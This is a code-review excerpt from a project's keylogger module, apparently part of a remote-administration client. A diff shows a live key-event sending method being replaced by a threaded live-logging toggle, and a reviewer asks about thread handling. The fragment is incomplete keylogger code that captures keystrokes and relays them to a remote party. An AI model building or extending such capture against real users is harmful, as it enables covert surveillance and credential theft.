Client/Core/Utilities/Keylogger.cs

```diff
@@ -312,14 +314,30 @@ private void WriteFile()
             _logFileBuffer.Clear();
         }
 
-        public void SendKeyEvent(Client client)
+        public void EnableLiveLogging(bool enable, Client client)
         {
-            //only process live packet if anything was recently appended
-            if (_liveKeyEventBuffer.Length > 0)
+            this.LiveModeEnabled = enable;
+
+            if (this.LiveModeEnabled)
             {
-                new GetKeyloggerLiveResponse(_liveKeyEventBuffer.ToString()).Execute(client);
-                _liveKeyEventBuffer.Clear();
+                _liveLoggerThread = new Thread(() =>
```

Comment:
@MaxXor  @yankejustin Would we be able to save the thread instance with a pointer to a method here, or is it fine to launch a new thread with an anonymous method each time the `EnableLiveLogging` method is called?